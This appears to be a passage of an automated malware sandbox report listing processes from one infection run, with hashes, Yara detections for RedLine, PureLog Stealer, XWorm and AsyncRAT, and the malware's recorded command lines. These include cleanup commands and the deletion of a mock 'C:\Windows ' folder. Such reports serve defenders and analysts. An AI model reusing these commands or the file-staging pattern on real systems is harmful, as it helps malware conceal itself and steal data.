                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:25
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\drivers\AppvVfs.sys
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:154'952 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:2CBABD729D5E746B6BD8DC1B4B4DB1E1
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:22
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:25
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\AppVClient.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\AppVClient.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:1'348'608 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:967B8B62127D887C6080C553324E82B9
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:25
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:28
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\FXSSVC.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\fxssvc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:1'242'624 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:43FB9AC7ED234297B5E93DB791F8F5A8
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:26
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:30
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:2'354'176 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:BE02F61FAC56C7D6563B746AF0B6AB07
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:27
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:30
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\Public\Libraries\Jwsmvmdw.PIF
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\Public\Libraries\Jwsmvmdw.PIF"
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:1'051'648 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:943266BC468E334D168F1F43831E8B7D
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:28
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:30
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:1'356'800 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:6E2F1562B4D5A495EA5EE8392DBBC2E3
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:30
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:32
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:68'096 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001E.00000001.1659980996.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001E.00000003.1663470654.00000000244EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001E.00000002.1777354937.000000002657E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001E.00000002.1740115481.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001E.00000002.1798010411.0000000029240000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001E.00000002.1795060712.00000000279E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001E.00000002.1782173123.00000000268B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001E.00000002.1782690545.0000000026A57000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:31
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:36
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\msdtc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\msdtc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:1'278'464 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:7C2A7829306AFD07E0A7BEE6B5203F55
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:32
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:37
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\Public\alpha.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x10000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:33
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:38
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\Public\alpha.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x10000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:34
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:38
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:1'235'968 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:083A7B3F7A1D4646EF789825E52C02AC
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:35
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:39
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\Public\alpha.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x10000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:36
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:39
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\Public\Libraries\Jwsmvmdw.PIF
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\Public\Libraries\Jwsmvmdw.PIF"
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:1'051'648 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:943266BC468E334D168F1F43831E8B7D
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:38
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:41
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:68'096 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000026.00000001.1748961423.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000026.00000002.1848536058.000000001FD45000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000026.00000002.1848938336.00000000213F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000026.00000002.1840076965.000000001E8BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000026.00000002.1842028459.000000001EDB7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000026.00000002.1840971745.000000001EB40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000026.00000002.1842028459.000000001ED41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000026.00000002.1842028459.000000001ED41000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000026.00000003.1766990632.000000001C684000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000026.00000002.1813978225.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:39
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:41
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\perfhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWow64\perfhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:1'150'976 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:66E9108DA1C020C738D8EA65CDBF5BE1
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:40
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:44
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\Locator.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\locator.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:1'141'248 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:525F4AE8B0B51CA29D93DB1875D48945
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:41
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:46
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\SensorDataService.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\SensorDataService.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:1'846'784 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:78D3D3C671FAB25B9BF6149AD1D00F30
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:42
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:47
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\snmptrap.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\snmptrap.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:1'146'880 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:16010E8846BCE27721A406159D8AE296
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:43
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:48
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\spectrum.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:1'455'616 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:5B5A04180D3C1BE14C02BA823EFE4460
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:44
                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:23:49
                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:01/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s SharedRealitySvc
                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff67e6d0000
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          Execution Coverage:16%
                                                                                                                                                                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                                                                                                                                          Signature Coverage:26.8%
                                                                                                                                                                                                                                                                                                                                                                                                                          Total number of Nodes:1857
                                                                                                                                                                                                                                                                                                                                                                                                                          Total number of Limit Nodes:15
